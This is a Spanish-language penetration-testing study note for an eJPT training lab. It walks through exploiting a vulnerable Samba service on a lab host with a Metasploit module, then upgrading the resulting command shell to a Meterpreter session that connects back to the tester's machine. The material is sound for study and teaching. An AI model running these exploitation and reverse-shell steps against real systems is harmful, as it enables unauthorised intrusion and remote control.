> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/fundamentos-de-la-postexplotacion/actualizacion-de-los-shells-de-comandos-a-shells-meterpreter.md).

# Actualización de los shells de comandos a shells Meterpreter

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/5OFtcfeDrvyOhOUM908Z" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/Om10QH23D4tvLREcz7Z4" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Escaneo de puertos con Nmap.

Para empezar, necesitamos identificar un servicio vulnerable ejecutándose en el sistema objetivo. Esto se puede lograr mediante un análisis de detección de versiones del servicio con Nmap.

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el escaneo de Nmap revela una versión vulnerable de SAMBA que se ejecuta en el puerto 445 y que puede explotarse mediante el uso de un módulo Metasploit.

<figure><img src="/files/tmCWa1Pkg9LobdqPKY6S" alt=""><figcaption></figcaption></figure>

**Paso 4:** Obtener acceso.

Para poder utilizar este módulo de exploit, necesitaremos iniciar la Consola de Metasploit Framework (msfconsole), esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

<figure><img src="/files/xANaUJUwJ1cdWW4AZoRo" alt=""><figcaption></figcaption></figure>

Después de iniciar msfconsole, podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/linux/samba/is_known_pipename
```

<figure><img src="/files/rm3uYJovCG8uiNBPbQkm" alt=""><figcaption></figcaption></figure>

Ahora tendremos que configurar las opciones del módulo; más específicamente, establecer el objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo.ine.local
```

<figure><img src="/files/8pOdHrLzPAXmEWPwkdeA" alt=""><figcaption></figcaption></figure>

Después de configurar las opciones del módulo, podemos ejecutar el módulo de exploit ejecutando el siguiente comando:

**Dominio:**

```
exploit
```

Como se muestra en la siguiente captura de pantalla, el módulo de explotación se ejecuta con éxito y nos proporciona una sesión de shell de comando en el sistema de destino.

<figure><img src="/files/bHB925xYGhTP2YhOkUzw" alt=""><figcaption></figcaption></figure>

**Paso 5:** Actualizar los shells de comando a shells de meterpreter.

Ahora que hemos obtenido acceso al sistema de destino a través de un shell de comandos, podemos poner la sesión en segundo plano ejecutando la siguiente combinación de teclado:

**Dominio:**

```
CTRL + Z
```

<figure><img src="/files/kkXGzLJETwCZ80WPMPvS" alt=""><figcaption></figcaption></figure>

Ahora podemos cargar el módulo **shell\_to\_meterpreter** ejecutando el siguiente comando:

**Dominio:**

```
use post/multi/manage/shell_to_meterpreter
```

Ahora necesitaremos configurar las opciones del módulo, más específicamente las opciones LHOST y SESSION ID, esto se puede hacer ejecutando los siguientes comandos:

Asegúrese de reemplazar LHOST con la dirección IP de su máquina Kali.

**Comandos:**

```
set SESSION 1
set LHOST 192.212.191.2
```

Ahora podemos ejecutar el módulo:

**Dominio:**

```
run
```

<figure><img src="/files/yDELjnMYGKf5gPDJBFfO" alt=""><figcaption></figcaption></figure>

Ahora podemos interactuar con la sesión de meterpreter ejecutando el siguiente comando:

**Dominio:**

```
sessions 2
```

Como se muestra en la siguiente captura de pantalla, ahora podemos interactuar con el sistema de destino con un shell meterpreter.

<figure><img src="/files/C03hxjgwFHCEfaj2aV9j" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, exploramos el proceso de actualización de una sesión de shell de comandos a una sesión de meterpreter.
